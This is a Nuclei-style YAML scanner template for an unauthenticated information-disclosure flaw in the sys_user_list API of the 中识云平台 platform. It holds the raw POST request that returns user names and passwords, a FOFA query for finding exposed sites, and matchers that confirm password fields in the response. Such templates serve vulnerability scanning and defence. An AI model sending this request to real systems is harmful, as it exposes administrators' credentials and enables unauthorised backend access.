http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - '"Ok!"'
            - '"name":'
            - '"pwd":'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /api/sys/sys_user_list?userName=admin HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/json

          {"page":1,"limit":10,"username":""}
id: zhongshiyunpingtai-sys_user_list-Information-disclosure
info:
    author: Superhero
    description: |-
        fofa: title="中识云平台"
        中识云平台 sys_user_list接口存在信息泄露漏洞，未经身份验证的远程攻击者可利用此漏洞获取网站后台系统用户密码等敏感信息，从而登录网站后台系统，使网站处于极不安全的状态。
    name: 中识云平台 sys_user_list 信息泄露漏洞
    reference:
        - https://mp.weixin.qq.com/s/c2NYqy-UiaGK5Z6UGO2now
    severity: medium
    tags:
        - Information disclosure
